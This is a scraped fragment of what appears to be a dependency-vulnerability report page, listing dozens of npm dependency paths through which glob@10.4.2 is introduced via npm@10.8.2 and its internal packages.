  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmaccess@8.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmhook@10.0.5 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmorg@6.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpublish@9.0.9 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmsearch@7.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmteam@6.0.5 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + npm-profile@10.0.0 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmversion@6.0.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpublish@9.0.9 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpublish@9.0.9 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
